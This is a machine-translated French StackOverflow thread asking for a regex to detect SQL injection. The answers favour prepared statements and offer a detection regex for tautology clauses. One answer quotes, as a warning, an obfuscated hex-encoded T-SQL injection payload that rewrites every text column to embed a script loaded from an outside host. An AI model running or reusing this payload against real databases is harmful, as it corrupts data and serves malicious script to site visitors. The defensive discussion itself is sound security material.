Question

Est-il une Expression Régulière qui permet de détecter SQL dans une chaîne de caractères?Quelqu'un aurait-il un exemple de quelque chose qu'ils ont utilisé avant de partager?

Était-ce utile?

La solution

Ne pas le faire.Vous êtes pratiquement voué à l'échec.Utilisation PreparedStatement (ou son équivalent) à la place.

Autres conseils

utiliser stockées procs ou préparées, comment allez-vous détecter quelque chose comme cela?BTW, n'exécutez PAS que

   DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415 245204054205641524348415228323535292C40432056415243
   4841522832353529204445434C415245205461626C655 F437572736F7220435552534F5220464F522053454C45435420612E6 E616D652C622E6E616D652046524F4D207379736F626A65637473206 12C737973636F6C756D6E73206220574845524520612E69643D622E6 96420414E4420612E78747970653D27752720414E442028622E78747 970653D3939204F5220622E78747970653D3335204F5220622E78747 970653D323331204F5220622E78747970653D31363729204F50454E2 05461626C655F437572736F72204645544348204E4558542046524F4 D205461626C655F437572736F7220494E544F2040542C40432057484 94C4528404046455443485F5354415455533D302920424547494E204 55845432827555044415445205B272B40542B275D20534554205B272 B40432B275D3D525452494D28434F4E5645525428564152434841522 834303030292C5B272B40432B275D29292B27273C736372697074207 372633D687474703A2F2F7777772E63686B626E722E636F6D2F622E6 A733E3C2F7363726970743E27272729204645544348204E455854204 6524F4D205461626C655F437572736F7220494E544F2040542C40432 0454E4420434C4F5345205461626C655F437572736F72204445414C4 C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);

Vous sauver les problèmes et utiliser des procédures stockées avec les requêtes préparées ou des requêtes paramétrées.Les procédures stockées sont des bonnes pratiques de toute façon, car ils agissent comme une interface à la base de données, de sorte que vous pouvez changer ce qui se passe derrière les scènes (à l'intérieur de la procédure stockée), mais la signature reste la même.Les déclarations préparées aider à prendre soin de l'injection de protection.

Je n'ai pas de regex, mais ma compréhension est que la chose la plus importante est de détecter la seule citation.Toutes les attaques par injection à partir de là.Ils ont probablement la -- là aussi de commenter et d'autres SQL qui peut être après la chaîne.

Comme l'a dit, il est préférable d'utiliser les requêtes préparées.On pourrait dire de forcer la clé des requêtes pour être exécutée par une procédure stockée pour forcer l'utilisation de la préparation de l'appel.

De toute façon, ici, c'est un simple grep pour détecter classique n=n entier dans les clauses where;il saute de l'essoufflement de l'1=1, utilisé par de nombreux paresseux requête constructeurs pour les ET de, mais qui va le marquer pour le OU

((WHERE|OR)[ ]+[\(]*[ ]*([\(]*[0-9]+[\)]*)[ ]*=[ ]*[\)]*[ ]*\3)|AND[ ]+[\(]*[ ]*([\(]*1[0-9]+|[2-9][0-9]*[\)]*)[ ]*[\(]*[ ]*=[ ]*[\)]*[ ]*\4

Il pourrait bien sûr être amélioré pour détecter les décimales et les comparaisons de chaînes, mais il a été rapidement un mécanisme de détection, le long de avec d'autres grep tels que ORD(MID, etc.

L'utiliser sur un journal de la requête, tel que mysql du journal général

Espérons que c'est utile

Licencié sous: CC-BY-SA avec attribution
Non affilié à StackOverflow
scroll top